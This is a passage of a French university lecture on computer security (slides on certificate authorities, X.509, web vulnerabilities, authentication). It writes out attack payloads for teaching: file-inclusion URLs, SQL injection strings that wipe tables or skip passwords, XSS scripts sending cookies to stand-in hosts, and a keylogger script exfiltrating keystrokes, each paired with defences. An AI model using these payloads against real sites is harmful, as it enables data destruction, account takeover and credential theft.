Page 276: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Autorité de certification : certification

Verisign

BNP

Clé privéede Verisign

chiffrement RSA

Hash

Hash chiffré

Clé Publiquede BNP

Certificateur : Verisign

Objet : BNP

Chiffrement : RSA

Hashage : MD5

Hash Codé

hashage MD5

Vérificationidentité

Clé publiquede BNP

Génération

Clé privéede BNP

Clé publiquede BNP

Publication web

[email protected] Sécurité Informatique/ March 31, 2018 276 / 381

Page 277: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Autorité de certification : utilisation

L’utilisateur, membre de la communauté reçoit le certificat.Il regarde dans le certificat l’AC.Il la reconnaît et regarde si la signature du certificat est exacte.

[email protected] Sécurité Informatique/ March 31, 2018 277 / 381

Page 278: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Autorité de certification : chaîne

Une AC peut-être membre d’une communauté avec elle-mêmeune ACLa vérification se répète :Vérification du certificat (arrêt et validation si l’AC l’ayantgénéré est reconnue)Vérification du certificat de l’AC auprès de l’AC supérieure(arrêt si celle-ci est reconnue).Boucle jusqu’à

AC auto-certifiée (que l’utilisateur accepte ou non)AC reconnue

[email protected] Sécurité Informatique/ March 31, 2018 278 / 381

Page 279: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Autorité de certification

Les navigateurs sont livrés avec des ACVerisignComodoetc..Pas encore d’AC administrative française (En cours deréflexion)Les CRL

[email protected] Sécurité Informatique/ March 31, 2018 279 / 381

Page 280: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Preuve

Beaucoup de contraintes pour les signatures

[email protected] Sécurité Informatique/ March 31, 2018 280 / 381

Page 281: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Certificats : Une norme X509

Que contient un certificat ?Une clé publiqueUn identifiant (email ou nom de machine)Un rôle (chiffrement, signature, AC)Des renseignements administratifs

[email protected] Sécurité Informatique/ March 31, 2018 281 / 381

Page 282: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Certificats : Une norme X509

Certificate:Data:

Version: 1 (0x0)Serial Number: 7829 (0x1e95)Signature Algorithm: md5WithRSAEncryptionIssuer: C=ZA, ST=Western Cape, L=Cape Town, O=Thawte Consulting cc,

OU=Certification Services Division,CN=Thawte Server CA/[email protected]

ValidityNot Before: Jul 9 16:04:02 1998 GMTNot After : Jul 9 16:04:02 1999 GMT

Subject: C=US, ST=Maryland, L=Pasadena, O=Brent Baccala,OU=FreeSoft, CN=www.freesoft.org/[email protected]

Subject Public Key Info:Public Key Algorithm: rsaEncryptionRSA Public Key: (1024 bit)

Modulus (1024 bit):00:b4:31:98:0a:c4:bc:62:c1:88:aa:dc:b0:c8:bb:

...d2:75:6b:c1:ea:9e:5c:5c:ea:7d:c1:a1:10:bc:b8:e8:35:1c:9e:27:52:7e:41:8f

Exponent: 65537 (0x10001)Signature Algorithm: md5WithRSAEncryption

93:5f:8f:5f:c5:af:bf:0a:ab:a5:6d:fb:24:5f:b6:59:5d:9d:....

0d:19:aa:ad:dd:9a:df:ab:97:50:65:f5:5e:85:a6:ef:19:d1:

[email protected] Sécurité Informatique/ March 31, 2018 282 / 381

Page 283: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Les AC pré-chargées

[email protected] Sécurité Informatique/ March 31, 2018 283 / 381

Page 284: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

URLographie

http://michel.arboi.free.fr/cryptFAQ

http://www.ossir.org/resist/supports/cr/200203/crypto.pdf

http://cr.yp.to/

[email protected] Sécurité Informatique/ March 31, 2018 284 / 381

Page 285: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Une faille c’est quoi ?

Un programme fait ce qu’on lui demandepas plus pas moinsavec les éléments qu’on lui fournitcomment fait-il quand il se trouve dans des conditions nonprévues ?

[email protected] Sécurité Informatique/ March 31, 2018 285 / 381

Page 286: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Injection : Condition normale

Je vais dans une boulangerie. En condition normale (en omettant lepaiement) :

Elle m’a demandé une variable : le nombre de baguettes.

[email protected] Sécurité Informatique/ March 31, 2018 286 / 381

Page 287: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Injection : Le pirate

Le pirate entre dans une boulangerie.

Elle m’a demandé une variable, le pirate répond avec une variable... suivie d’un ordre. Si le programme n’a pas prévu le cas, c’estfoutu.Une solution ?

[email protected] Sécurité Informatique/ March 31, 2018 287 / 381

Page 288: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Débordement : Condition normale

En condition normale, je dépose ma commande à la boulangerie :

La serveuse traite les commandes, puis reprend la liste des choses àfaire.

[email protected] Sécurité Informatique/ March 31, 2018 288 / 381

Page 289: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Débordement : Le pirate

Le pirate dépose sa commande en espérant que la pile de sacommande va déborder sur la liste des choses à faire

Bingo !!

[email protected] Sécurité Informatique/ March 31, 2018 289 / 381

Page 290: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Les applications web

Les failles d’un site web.

[email protected] Sécurité Informatique/ March 31, 2018 290 / 381

Page 291: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Problème générique des failles

Les failles sont dues à l’utilisation imprévue d’une variable pourobtenir un comportement inattendu, mais contrôlé, plus ou moinscorrectement, par le pirate.Contrairement à ce que montre le cinéma, les intrusions sont dûes àplus de 90% à l’utilisation de failles de sécurité, et non à unproblème de mot de passe.Les serveurs web étant souvent les seuls points accessibles, voyonscomment cela peut se passer.

[email protected] Sécurité Informatique/ March 31, 2018 291 / 381

Page 292: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Structure d’un service web

[email protected] Sécurité Informatique/ March 31, 2018 292 / 381

Page 293: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

20 points de vulnérabilités

Du schéma précédent, on peut trouver 20 points de vulnérabilités :Les logiciels

Les serveursLes scriptsLes modulesLes outils de protection (antivirus, antispyware, etc.)

Les OSLes matérielsLes communicationsL’utilisateurLes protocoles

[email protected] Sécurité Informatique/ March 31, 2018 293 / 381

Page 294: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Les types de paramètres

Variables GET. Elles sont données dans l’URL de demande.Variables POST. Fournies par un formulaire.Variables Cookies. Variables conservées par le navigateur surson disque dur et généralement fournies par le serveur.Variables SERVER (HTTP_USER_AGENT ouHTTP_REFERER)

[email protected] Sécurité Informatique/ March 31, 2018 294 / 381

Page 295: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Les variables GET

Décrites dans l’URL.http://www.google.com/search?p=html&hl=fr.Ici 2 variables p et hl, avec les valeurs html et fr.Généralement provenant d’une interrogation directe.Dans le cas présent, plutôt rare, il s’agit d’envoi par formulaire(method=GET).

[email protected] Sécurité Informatique/ March 31, 2018 295 / 381

Page 296: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Les variables POST

Remplies par un formulaire.Utilisées quand on a un grand volume de données à envoyer.Utilisées quand on a un grand nombre de variables.Non tracées par les journaux des daemons (hormis modulesspécifiques).Traitement particulier des variables Hidden qui sont cachéespour l’utilisateur, mais pas pour le navigateur.

[email protected] Sécurité Informatique/ March 31, 2018 296 / 381

Page 297: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Les variables cookies

Notion de valise de variables stockées sur le clientTransmises de manière transparente dans la requêteC’est le serveur qui est sensé positionner ces variables pour unedurée limitéeUn serveur ne peut généralement (sauf faille de sécurité)demander à accéder qu’aux variables :

Qu’il a lui-même positionnées.Qu’une machine de son domaine a positionnées (et si celle-cil’a autorisé).

[email protected] Sécurité Informatique/ March 31, 2018 297 / 381

Page 298: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Les variables SERVER

Ces variables sont hétéroclites.Celles que seul le serveur connait

Version du serveurRépertoire de travail

Celles qui sont associées à la connexionL’adresse du client REMOTE_ADDRL’hôte appeléLe port source

Celles qui proviennent du clientLe Referer : HTTP_REFERERLe USER_AGENTL’URL appelée

[email protected] Sécurité Informatique/ March 31, 2018 298 / 381

Page 299: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

MUV : principe fondamental

Ces variables proviennent en majorité du client.Il a donc tout pouvoir pour les modifier, effacer.Les contrôles Javascript sont exécutés par le client ( s’il lesouhaite ! ).Les contrôles de formulaire (taille, type) sont exécutés par leclient ( s’il le souhaite ! ).

[email protected] Sécurité Informatique/ March 31, 2018 299 / 381

Page 300: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

MUV : Généralisation : Injection de code

Faille de sécurité : faire exécuter du code informatiqueCe code va être injecté par une "interface" pas prévue pourCe code dépend de qui va l’éxecuter et du vecteur d’injection

Nom Langage Vecteur Interpréteur/VictimeBuffer Overflow Assembleur Binaire ProcesseurSQL Injection SQL web SGBDLDAP Injection LDAP web annuaire LDAPInjection shell, DOS, etc. web Interpréteur backofficeXSS Javascript web navigateurCSRF HTML web navigateurscript PDF Javascript PDF lecteur PDF

[email protected] Sécurité Informatique/ March 31, 2018 300 / 381

Page 301: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

MUV : Quelques exemples

Variables sur les noms de fichier (ou les répertoires)Variables dites superglobalesVariables dans les requêtes SQL (ou LDAP ou toutinterpréteur)Variables pour du XSS

[email protected] Sécurité Informatique/ March 31, 2018 301 / 381

Page 302: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

MUV : Sur les noms de fichiers

Exemple d’inclusion.

Soit le programme suivant<?include ("header.inc");$page=$_GET[’page’];include ($page);include ("footer.inc");?>

que l’on utilise de la manière suivante

Utilisationhttp://192.168.30.72/mep.php?page=toto.txt

[email protected] Sécurité Informatique/ March 31, 2018 302 / 381

Page 303: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

MUV : Sur les noms de fichiers

Quelques attaques :

Exemples simples d’utilisation malveillantehttp://192.168.30.72/mep.php?page=/etc/passwdhttp://192.168.30.72/mep.php?page=https://dsi.ut-capitole.fr/creufophacker.inc

On pourrait de la même manière utiliser les fonctions fopen,require, etc.

[email protected] Sécurité Informatique/ March 31, 2018 303 / 381

Page 304: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

MUV :Solution

Refuser les requêtes avec des caractères dangereux<?If (eregi("/",$page)){die("Va jouer dans le mixer !")}include ("header.inc");include ($page);include ("footer.inc");?>

On doit aussi utiliserLa notion de "allow_url_fopen" et "allow_url_include" duphp.ini en les mettant à faux,La notion de "open_basedir" en listant les répertoires autorisésEmpêcher l’utilisateur apache de sortir (avec un firewall ensortie), on pourra aussi bloquer MySQL et proftpd.

[email protected] Sécurité Informatique/ March 31, 2018 304 / 381

Page 305: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

MUV : Les injections SQL (ou LDAP)

Le SQL est un langage d’interrogation de base de données. C’estun véritable langage de programmation, avec ses fonctions, sesvariables, ses commentaires.Le principe des appels SQL en WWW, est que le langage (PHP parexemple) crée une chaine de caractères (la commande SQL) qui estensuite envoyée au SGBD.Le SGBD interprète et exécute le programme envoyé.

[email protected] Sécurité Informatique/ March 31, 2018 305 / 381

Page 306: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

MUV : Les injections SQL ou LDAP

Utilisationhttp://192.168.30.72/test_sql.php?id=3;

Code du programme$sql_query="DELETE FROM matable WHERE id=$id";mysql_connect($database);mysql_query($database,$sql_query);

[email protected] Sécurité Informatique/ March 31, 2018 306 / 381

Page 307: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

MUV : Les injections SQL première attaque

Les espaces doivent être remplacés par %20http://192.168.30.72/test_sql.php?id=3 OR 1=1

ce qui nous donne

Chaine envoyée au SGBDDELETE FROM matable WHERE id=3 OR 1=1

Le résultat est la destruction de tous les enregistrements.

[email protected] Sécurité Informatique/ March 31, 2018 307 / 381

Page 308: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

MUV : Les injections SQL 1bis

Code du programme<?$sql_query="DELETE FROM matable WHERE id=$id AND champ1=true";mysql_connect($database);mysql_query($database,$sql_query);?>

[email protected] Sécurité Informatique/ March 31, 2018 308 / 381

Page 309: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

MUV : Les injections SQL attaque 1bis

On ajoute un commentairehttp://192.168.30.72/test_sql.php?id=3 OR 1=1 --

ce qui nous donne :

Chaine envoyée au SGBDDELETE FROM matable WHERE id=3 OR 1=1 -- AND champ1=true

Le résultat est la destruction de tous les enregistrements, car la findu WHERE n’est pas prise en compte.

[email protected] Sécurité Informatique/ March 31, 2018 309 / 381

Page 310: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

MUV : Les injections SQL attaque 1ter

Un commentaire peut suffirehttp://192.168.30.72/login.php?login=admin --

ce qui nous donne :

Chaine envoyée au SGBDSELECT uid FROM user WHERE login=$login -- AND password=$password

Le résultat est une identification sans mot de passe.

[email protected] Sécurité Informatique/ March 31, 2018 310 / 381

Page 311: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

MUV : Les injections SQL première solution

La première solution peut consister à modifier le programme enajoutant des quotes

Code du programme$sql_query="DELETE FROM matable WHERE id=’$id’";

Le résultat de la première attaque devient alors

Code du programmeDELETE FROM matable WHERE id=’3 OR 1=1’

qui est sans danger.Mais pourtant une faille existe encore

[email protected] Sécurité Informatique/ March 31, 2018 311 / 381

Page 312: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

MUV : Les injections SQL deuxième attaque

Insérons une quotehttp://192.168.30.72/test_sql.php?id=3’ OR 1=1 --

ce qui nous donne

Chaine envoyée au SGBDDELETE FROM matable WHERE id=’3’ OR 1=1 -- ’

Le résultat est encore la destruction de tous les enregistrements.

[email protected] Sécurité Informatique/ March 31, 2018 312 / 381

Page 313: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

MUV : Les injections SQL deuxième solution

La solution va passer par 2 possibilitésle magic_quotes_gpc à on (ATTENTION : les versions dePHP influent !)la fonction addslashes (idem)

Code du programme$id=add_slashes($id);$sql_query="DELETE FROM matable WHERE id=’$id’";

L’attaque précédente donne alors

Chaine envoyée au SGBDDELETE FROM matable WHERE id=’3\’ OR 1=1’

Qui ne fait plus rien. Mais ce n’est toujours pas fini. Une failleexiste malgré cela.

[email protected] Sécurité Informatique/ March 31, 2018 313 / 381

Page 314: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

MUV : Les injections SQL troisième attaque

Le but de magic_quotes_gpc est à ON. Mais il a des problèmesavec les caractères dits "multibytes" : c’est à dire les alphabets pluscomplexes (chinois par exemple)A la place de la quote, plaçons le caractère multibyte ’0xbf27’ .Cela ne peut réellement se faire que par un script :

Parlons chinois$id=chr(0xbf).chr(0x27)." OR 1=1";fopen(http://192.168.30.72/test_sql.php?id=$id)";

[email protected] Sécurité Informatique/ March 31, 2018 314 / 381

Page 315: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

MUV : Les injections SQL troisième attaque

Le PHP reçoit un caractère multibyte chinois 0xbf27Il l’envoie à addslashes (ou à magic_quotes_gpc, ce qui estidentique)Celui-ci ne comprenant pas que c’est un caractère multibytes,croit voir 2 caractères : 0xbf et 0x27 qui est une quote. Ilajoute à 0x27 un antislash (0x5c).La chaine renvoyée à PHP est donc 0xbf5c27.Comme PHP renvoie à MySQL qui lui comprend le multibyte(si la BD est en UTF8), et que 0xbf5c est un caractèrevalide, il nous reste 0x27 qui est... la quote.

[email protected] Sécurité Informatique/ March 31, 2018 315 / 381

Page 316: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

MUV : Les injections SQL troisième attaque

On obtient alors la chaine suivante :

Chaine envoyée au SGBD

DELETE FROM matable WHERE id=’3 ’ OR 1=1’

Le résultat est encore la destruction de tous les enregistrements.Solutions :

mysql_real_escape_string().les requêtes préparées.

[email protected] Sécurité Informatique/ March 31, 2018 316 / 381

Page 317: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Et si c’était possible ?

[email protected] Sécurité Informatique/ March 31, 2018 317 / 381

Page 318: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

MUV : Les variables de session

Les variables de session permettent de mettre les variableshabituellement mises en cookies, uniquement sur le serveur

Cela évite de trimbaler beaucoup d’informations.On n’a plus à les contrôler à chaque fois (elles ne sont plusmodifiables).

Seule reste une variable dans le cookie : celle qui contient lenuméro de session. En général, cette variable est équivalente à unidentifiant (on ne réauthentifie plus la personne).Pour un pirate, c’est le cookie à obtenir.

[email protected] Sécurité Informatique/ March 31, 2018 318 / 381

Page 319: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

MUV : Voler un cookie : Attaque

Soit un forum avec une zone de texte quelconque.

Si on saisitSalut les potes, le cours est génial, le prof est <B>super</B>.Reviendez....

On obtient doncSalut les potes, le cours est génial, le prof est super.

Reviendez....

[email protected] Sécurité Informatique/ March 31, 2018 319 / 381

Page 320: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

MUV : Voler un cookie : Problème

Et si on saisit ?<script>while (1)alert("Vas téter la prise électrique");</script>

[email protected] Sécurité Informatique/ March 31, 2018 320 / 381

Page 321: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

MUV : Voler un cookie : Problème

Soyons plus méchant :

Récupérons le cookie<script>cookie=document.cookie();i=new image();i.src="http://www.pirate.com/?id="+cookie;</script>

[email protected] Sécurité Informatique/ March 31, 2018 321 / 381

Page 322: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

MUV : Voler un cookie : Solution

Bloquer la chaine "<script" dans les messages.

[email protected] Sécurité Informatique/ March 31, 2018 322 / 381

Page 323: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

MUV : Voler un cookie : Vraiment la solution ?

Comment s’écrit script ?"<script""<javascript""<JAVAscript""<java script""<javascript

et ça ?<&#00015;&#099;&#00015;&#x72;&#0000105;&#x070;&#x0074;>

[email protected] Sécurité Informatique/ March 31, 2018 323 / 381

Page 324: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

MUV : Pire encore ?

un javascript s’appelle aussi par

Par erreur<img src=Y onerror="document.location= ’http://pir.com/vol?ck=’+document.cookie">

Spécifique IE<bgsound onpropertychange="code Javascript">

[email protected] Sécurité Informatique/ March 31, 2018 324 / 381

Page 325: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

MUV : XSS = solution globale

Il faut utiliser sur toutes les variables externesGET, POST,HTTP_REFERER, HTTP_USER_AGENTdans les Cookies (même si on les a déjà contrôlées)

la fonction htmlentities().

[email protected] Sécurité Informatique/ March 31, 2018 325 / 381

Page 326: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

MUV : XSS = vol de cookie ?

Ce n’est qu’une possibilité, par la transformation du navigateur.Mais en quoi ?

[email protected] Sécurité Informatique/ March 31, 2018 326 / 381

Page 327: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

En outil de DOS HTTP : JS-LOIC

[email protected] Sécurité Informatique/ March 31, 2018 327 / 381

Page 328: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Et moi ?

<script language="javascript">var keys=’’;document.onkeypress = function(e) {

get = window.event?event:e;key = get.keyCode?get.keyCode:get.charCode;key = String.fromCharCode(key);keys+=key;

}window.setInterval(function(){

new Image().src = ’http://hack.com/keylogger.php?c=’+keys;keys = ’’;

}, 1000);</script>

[email protected] Sécurité Informatique/ March 31, 2018 328 / 381

Page 329: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Et si on intégrait tout ça ?

http://www.beefproject.com

[email protected] Sécurité Informatique/ March 31, 2018 329 / 381

Page 330: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Un constat difficile

Un constatbeaucoup d’applications sont livrées "telles quelles"il y a souvent un historique lourdles applications sont "mouvantes".les développeurs ne sont pas souvent formés.

[email protected] Sécurité Informatique/ March 31, 2018 330 / 381

Page 331: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Des solutions globales

D’où des solutions "globales"des IPS réseau pour bloquerdes modules de sécurité

en négatif : mod_security (apache)en positif : naxsi (nginx)parfois directement sur le serveur à protégersouvent utilisés en reverse-proxy.

[email protected] Sécurité Informatique/ March 31, 2018 331 / 381

Page 332: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

L’authentification

Différence identification et authentificationMulti-facteurs ou pasSur quels périmètres

Accès aux machinesAccès aux applicationsAccès au réseau

SSO : Same Sign On ou Single Sign On ?

[email protected] Sécurité Informatique/ March 31, 2018 332 / 381

Page 333: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Méthodes d’authentification

Locale (Fichiers, SQL)Radius (historique, multiprotocoles, AAA)LDAP et Active Directory (parfois en backend)Kerberos (SSO général, mal implémenté par Microsoft)SSO Web Intra-organisation (CAS)SSO Trans-organisations (Shibboleth, Oauth)

[email protected] Sécurité Informatique/ March 31, 2018 333 / 381

Page 334: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Les mécanismes physiques

Ce que l’on aFIDO et YubikeyRSA SecurID

Ce que l’on estlecture d’empreintes digitales (ou de carte veineuse)lecture d’iris de l’oeilreconnaissance du visagevitesse de frappe sur les touches

[email protected] Sécurité Informatique/ March 31, 2018 334 / 381

Page 335: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Vérifier sa sécurité

Vérifier sa sécurité.

[email protected] Sécurité Informatique/ March 31, 2018 335 / 381

Page 336: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Vérifier sa sécurité

Etre persuadé que sa sécurité est efficace n’est pas suffisant : ilfaut à minima vérifier que cela correspond à la réalité.

Vérifier que les outils de sécurité sont actifsVérifier que les procédures de sécurité sont suiviesPermettre aux utilisateurs de découvrir leurs outils de sécuritéVérifier notre e-réputationFaire tester sa sécurité.

[email protected] Sécurité Informatique/ March 31, 2018 336 / 381

Page 337: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Vérifier que les outils de sécurité sont actifs

Vérifier les antivirus grâce http://eicar.com.Déclenchent-ils des alertes sur le poste ?sur le serveur de messagerie ?sur le proxy web ?

Vérifier les ports ouverts grâce à ShieldUp de grc.comVérifier le niveau de chiffrement avec sslabs.com

[email protected] Sécurité Informatique/ March 31, 2018 337 / 381

Page 338: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Vérifier que les procédures sont actives

Les antivirus sont-ils à jour ? Comment le voit-on ?Les infections virales remontent-elles sur la console centrale ?Y-a-t-il des remontées d’alarmes (syslog par exemple) en casde problème ?Les filtres d’url fonctionnent-ils ?Les vérifications de procédures sont-elles régulières etautomatiques ?etc.

